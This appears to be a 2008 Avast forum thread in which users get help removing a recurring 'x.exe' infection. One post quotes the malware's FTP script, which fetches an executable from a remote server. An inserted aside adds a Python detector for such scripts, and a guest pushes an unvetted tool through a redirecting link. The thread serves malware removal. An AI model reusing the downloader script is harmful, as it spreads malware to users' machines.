Author Topic: Infected by x.exe more than 20 times  (Read 34128 times)

Offline RZPogi

  • Sr. Member
  • ****
  • Posts: 237
Re: Infected by x.exe more than 20 times
« Reply #30 on: December 01, 2008, 02:22:58 AM »
http://www.mediafire.com/download.php?uztmmig2yjn

for the dr web results.

I fell asleep while waiting for dr. web to finish.

Most of the results are related to vtp.
DESKTOP: Win 10, Avast 20 Free, Windows firewall, Malwarebytes free

LAPTOP: Win 10, Windows Defender, Malwarebytes free, Windows Firewall, Mcshield

Offline RZPogi

  • Sr. Member
  • ****
  • Posts: 237
Re: Infected by x.exe more than 20 times
« Reply #31 on: December 01, 2008, 03:23:47 AM »
http://www.mediafire.com/download.php?mni4nioljz2

for new hijackthis log

http://www.mediafire.com/download.php?jtyjy2dqymn

for combo-fix log

x.exe is still detected and that "i" trojan detected by sdfix is back and multiple IPs are blocked again at 50213.

I should change the port of utorrent.

Offline essexboy

  • Malware removal instructor
  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 40589
  • Dragons by Sasha
    • Malware fixes
Re: Infected by x.exe more than 20 times
« Reply #32 on: December 01, 2008, 09:23:52 PM »
Yes I would recommend changing the port

1. Please download The Avenger2 by Swandog46 to your Desktop.
  • Right click on the Avenger.zip folder and select "Extract All..."
  • Follow the prompts and extract the avenger folder to your desktop
2. Copy all the text contained in the code box below to your Clipboard by highlighting it and pressing (Ctrl+C):

Code:
Begin copying here:

Files to replace with dummy:
c:\windows\system32\i

Files to delete:
c:\windows\IFinst27.exe
c:\windows\system32\Uharc.exe
c:\windows\system32\reico.exe

Note: the above code was created specifically for this user.  If you are not this user, do NOT follow these directions as they could damage the workings of your system.


3. Now, open the avenger folder and start The Avenger program by clicking on its icon.
  • Right click on the window under Input script here:, and select Paste.
  • You can also Paste the text copied to the clipboard into this window by pressing (Ctrl+V), or click on the third button under the menu to paste it from the clipboard.
  • Click on Execute
  • Answer "Yes" twice when prompted.
4. The Avenger will automatically do the following:
  • It will Restart your computer. (In cases where the code to execute contains "Drivers to Delete" or "Drivers to Disable", The Avenger will actually restart your system twice.)
  • After the restart, it creates a log file that should open with the results of Avenger's actions. This log file will be located at C:\avenger.txt
  • The Avenger will also have backed up all the files, etc., that you asked it to delete, and will have zipped them and moved the zip archives to C:\avenger\backup.zip.
5. Please copy/paste the content of c:\avenger.txt into your reply along with a fresh Hijackthis log.

plugplay

  • Guest
Re: Infected by x.exe more than 20 times
« Reply #33 on: December 01, 2008, 10:41:35 PM »
I am having a problem with the same files... 

Nicodemius

  • Guest
Re: Infected by x.exe more than 20 times
« Reply #34 on: December 01, 2008, 11:41:09 PM »
Hi all,
I also have the same problem with "x.exe" and "quicktime.exe" located at system32 level; there's also a file called "I". When I open this file I have the following instructions in it:
-------------
open 212.xxx.xxx.xx 2755
user 1 1 
get x.exe 
quit 
------------
The "get x.exe" is sometimes changed to "get y.exe", only when the x.exe already exists.
The DwdnolleE.dll has also been found by avast in my temp files (I don't know if it is related or not?)
I've tried all the solutions mentioned above but the x.exe still reappears together with the "I" file.

If someone has an idea to solve this problem I'm at your disposal to give you logs, reports or whatever you need. I want to get rid of it because I'm stuck  ??? :'(

tx Nico
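
Added example, not part of the original post or of any tool named in this thread: the four lines quoted from the "I" file have the shape of a command script for a command-line FTP client (connect, log in, fetch one executable, quit). The Python sketch below parses such text and flags a file that is nothing but an FTP script fetching an executable, returning the host, port and file name for use in firewall or log review. The sample strings are constructed, and 192.0.2.10 is a documentation address standing in for the masked IP.

```python
# Extensions that make a fetched file count as executable content.
EXEC_EXT = (".exe", ".dll", ".scr", ".com", ".bat", ".cmd", ".pif")
# Harmless FTP client commands that may appear around the transfer.
NEUTRAL = ("binary", "bin", "ascii", "prompt", "cd", "lcd", "hash")

def parse_ftp_script(text):
    """Summarise FTP-client script text: server, port, files fetched."""
    info = {"host": None, "port": None, "login": False,
            "fetched": [], "quits": False, "unknown": 0}
    for raw in text.splitlines():
        parts = raw.split()
        if not parts or set(raw.strip()) <= {"-"}:
            continue  # blank line or a dashed separator
        cmd, args = parts[0].lower(), parts[1:]
        if cmd == "open" and args:
            info["host"] = args[0]
            has_port = len(args) > 1 and args[1].isdigit()
            info["port"] = int(args[1]) if has_port else 21
        elif cmd == "user":
            info["login"] = True
        elif cmd in ("get", "recv"):
            info["fetched"].extend(args[:1])  # first argument = remote name
        elif cmd in ("quit", "bye"):
            info["quits"] = True
        elif cmd not in NEUTRAL:
            info["unknown"] += 1  # not an FTP command: probably ordinary text
    return info

def looks_like_ftp_dropper(text):
    """True when every line is an FTP command and an executable is fetched."""
    info = parse_ftp_script(text)
    fetches_exe = any(f.lower().endswith(EXEC_EXT) for f in info["fetched"])
    return bool(info["host"]) and fetches_exe and info["unknown"] == 0

# Constructed sample modelled on the lines quoted in the post above.
SAMPLE_I = "open 192.0.2.10 2755\nuser 1 1\nget x.exe\nquit\n"
# Constructed benign script: fetches a text file from the default port.
BENIGN = "open ftp.example.org\nuser anonymous guest\nget readme.txt\nbye\n"

if __name__ == "__main__":
    print(parse_ftp_script(SAMPLE_I))
    print(looks_like_ftp_dropper(SAMPLE_I), looks_like_ftp_dropper(BENIGN))
```
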



Offline essexboy

  • Malware removal instructor
  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 40589
  • Dragons by Sasha
    • Malware fixes
Re: Infected by x.exe more than 20 times
« Reply #35 on: December 02, 2008, 12:04:16 AM »
This one is extremely difficult to get rid of as there is within your system a randomly named ini or exe file that has to be located and deleted. By itself the file looks and scans as totally innocuous. The last one that I cured was running via CMD.exe, a legitimate Windows file.

If you start a new thread I will assist you there otherwise it could get confusing with multiple users in the same thread (for me that is  ;D )

The initial logs that I would require are as below: (by the way Avast sometimes gets a hissy fit with GMER)

To ensure that I get all the information this log will need to be uploaded to Mediafire and post the sharing link.

Download OTScanit to your Desktop and double-click on it to extract the files. It will create a folder named OTScanIt on your desktop.
  • Close ALL OTHER PROGRAMS.
  • Open the OTScanit folder and double-click on OTScanit.exe to start the program.
  • Check the box that says Scan All User Accounts
  • Check the Radio button for Rootkit check YES
  • Check the Radio buttons for Files/Folders Created Within 90 Days and Files/Folders Modified Within 90 Days
  • Under Additional Scans check the following:
    • File - Lop Check
    • Reg - BotCheck
    • File - Additional Folder Scans
    • File - Purity Scan
  • Now click the Run Scan button on the toolbar.
  • Let it run unhindered until it finishes.
  • When the scan is complete Notepad will open with the report file loaded in it.
  • Click the Format menu and make sure that Wordwrap is not checked. If it is then click on it to uncheck it.

Nicodemius

  • Guest
Re: Infected by x.exe more than 20 times
« Reply #36 on: December 02, 2008, 06:52:57 PM »
Hi essexboy,

I have posted the log in this new thread: http://forum.avast.com/index.php?topic=40611.0

tx for helping us  :D

Nico

t68kv

  • Guest
Re: Infected by x.exe more than 20 times
« Reply #37 on: December 16, 2008, 12:07:35 PM »
Try using quicksmash. Just follow the quicksmash assistance instruction.

Check it here:
http://t68kv.net76.net/

If you're afraid or cannot understand much about the software feel free to pm me thru instant messenger.
I already tested and removed that x.exe but of course test it first before we say it is very effective if it removed yours.

t68kv

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 88184
  • No support PMs thanks
Re: Infected by x.exe more than 20 times
« Reply #38 on: December 16, 2008, 04:40:52 PM »
Why do you post a URL that redirects to hXXp://t68kv.multiply.com/? Why not just post that URL?

I get very twitchy (especially when it is security related) when URLs I might click on redirect, other than the likes of tinyurl.com, etc. that are known redirect services.

I guess because it is on multiply, that accounts for the googleadservices.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 23.9.6082 (build 23.9.8494.792) UI 1.0.781/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

t68kv

  • Guest
Re: Infected by x.exe more than 20 times
« Reply #39 on: December 16, 2008, 05:16:44 PM »
Oh sorry, you ask why not use the multiply URL directly? Answer is to make my web account "http://t68kv.net76.net/" active and use it to update some of the files used by these tools, "very small file storage". Not for google ads or any other purposes to earn something. :)



QUICKSMASH ASSISTANCE

1. Download quicksmash, after downloading open it.
2. Check "include hijackthislog", "Update Before Smashing".
3. Follow the steps on uploading the log created by the quicksmash.
   Wait for the "Finish" message, and follow the instruction on the next messageboxes.
   Usually the filename is named at the current date on your computer. EX "13-08-2008"
4. Post the link. The link must be working for fast response from the team.
5. Wait for response or further instruction from T68KV or other reliable team member.
   Usually they will tell you to redo the instruction after updating the definition.

Quicksmash
http://www.4shared.com/file/49439376/457533bb/QuickSMASH.html
« Last Edit: December 16, 2008, 09:25:27 PM by t68kv »

Offline RZPogi

  • Sr. Member
  • ****
  • Posts: 237
Re: Infected by x.exe more than 20 times
« Reply #40 on: April 14, 2009, 08:01:52 PM »
That annoying x.exe is coming back after four months but now with an infected png file.

defense+ detected a buffer overflow with svchost.exe (found in system32 folder).
If I skipped the alert, the infected png file will come with x.exe.
However, terminating svchost.exe will cause the pc not to shut down using windows. The only way to turn off the pc is to press the power button in the cpu for about 6 seconds.

Terminating svchost is a better option than becoming infected.
Well, I think that this problem is solved for now.